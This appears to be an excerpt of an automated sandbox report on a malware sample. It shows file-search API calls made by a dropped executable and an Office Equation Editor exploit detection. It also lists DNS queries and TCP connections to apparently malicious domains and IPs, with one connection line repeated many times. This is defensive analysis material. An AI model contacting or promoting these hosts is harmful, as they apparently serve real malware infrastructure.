Source:	Binary string: wntdll.pdb source: fredchungel99962.exe, 00000005.00000003.347165757.0000000001140000.00000004.00001000.00020000.00000000.sdmp, fredchungel99962.exe, 00000005.00000003.347607847.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000006.00000002.382638779.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.382638779.0000000000870000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.357269124.0000000000580000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.357579627.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000008.00000003.380970803.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000008.00000002.841503603.0000000002170000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000008.00000003.382999741.0000000001E60000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000008.00000002.841503603.0000000001FF0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\browser\app\firefox.pdb source: finger.exe, 00000008.00000003.439245227.0000000005C30000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000008.00000003.438784233.0000000005D5C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000E.00000002.457692397.0000000000F20000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdb source: finger.exe, 00000008.00000002.841615616.000000000289C000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.841422328.000000000065E000.00000004.00000020.00020000.00000000.sdmp, CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 0000000A.00000002.841981166.0000000002DAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.457706612.000000000128C000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_0131DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	5_2_0131DBBE
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_012EC2A2 FindFirstFileExW,	5_2_012EC2A2
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_0132698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	5_2_0132698F
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_013268EE FindFirstFileW,FindClose,	5_2_013268EE
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_0131D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	5_2_0131D076
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_0131D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	5_2_0131D3A9
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_0132979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	5_2_0132979D
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_01329642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	5_2_01329642
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_01329B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	5_2_01329B2B
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_01325C97 FindFirstFileW,FindNextFileW,FindClose,	5_2_01325C97

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Source: global traffic	DNS query: name: covid19help.top
Source: global traffic	DNS query: name: www.thechurchinkaty.com
Source: global traffic	DNS query: name: www.sqlite.org
Source: global traffic	DNS query: name: www.hggg2qyws.sbs
Source: global traffic	DNS query: name: www.hggg2qyws.sbs
Source: global traffic	DNS query: name: www.297tamatest1kb.com
Source: global traffic	DNS query: name: www.quirkyquotients.online
Source: global traffic	DNS query: name: www.zopter.dev
Source: global traffic	DNS query: name: www.gudvain.top
Source: global traffic	DNS query: name: www.nimaster.com
Source: global traffic	DNS query: name: www.deniztemiz.fun
Source: global traffic	DNS query: name: www.agoraeubebo.com
Source: global traffic	DNS query: name: www.5597043.com
Source: global traffic	DNS query: name: www.domprojekt.pro
Source: global traffic	DNS query: name: www.northeastcol0r.com
Source: global traffic	DNS query: name: www.rtp7winbet.one

Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 91.195.240.19:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 47.238.226.135:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 162.255.119.150:80
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 66.96.162.142:80
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 192.185.225.30:80
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 203.161.62.199:80
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 217.26.48.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49193 -> 46.28.105.2:80
Source: global traffic	TCP traffic: 192.168.2.22:49197 -> 162.240.81.18:80
Source: global traffic	TCP traffic: 192.168.2.22:49201 -> 91.195.240.94:80
Source: global traffic	TCP traffic: 192.168.2.22:49205 -> 46.242.239.47:80
Source: global traffic	TCP traffic: 192.168.2.22:49209 -> 208.91.197.27:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
